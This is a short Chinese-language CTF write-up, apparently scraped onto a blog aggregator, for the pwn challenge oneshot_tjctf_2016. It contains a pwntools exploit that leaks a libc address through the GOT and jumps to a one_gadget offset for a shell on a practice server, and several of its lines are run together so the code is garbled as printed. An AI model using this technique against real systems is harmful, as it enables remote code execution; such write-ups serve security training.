本文主要是介绍oneshot_tjctf_2016,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
oneshot_tjctf_2016
查看保护
输入一个地址会跳到那个地址,再次输入会改那个地址
给got,改got为one_gadget即可。
from pwn import *context(arch='amd64', os='linux', log_level='debug')file_name = './z1r0'debug = 1
if debug:r = remote('node4.buuoj.cn', 25658)
else:r = process(file_name)elf = ELF(file_name)def dbg():gdb.attach(r)puts_got = elf.got['puts']
r.sendlineafter('Read location?', str(puts_got))
r.recvuntil('0x')
puts_addr = int(r.recvuntil('\n'), 16)
success('puts_addr = ' + hex(puts_addr))libc = ELF('./libc-2.23.so')libc_base = puts_addr - libc.sym['puts']
one = [0x45216, 0x4526a, 0xf02a4, 0xf1147]
one_gadget = one[0] + libc_baser.sendlineafter('Jump location?', str(one_gadget))r.interactive()
这篇关于oneshot_tjctf_2016的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
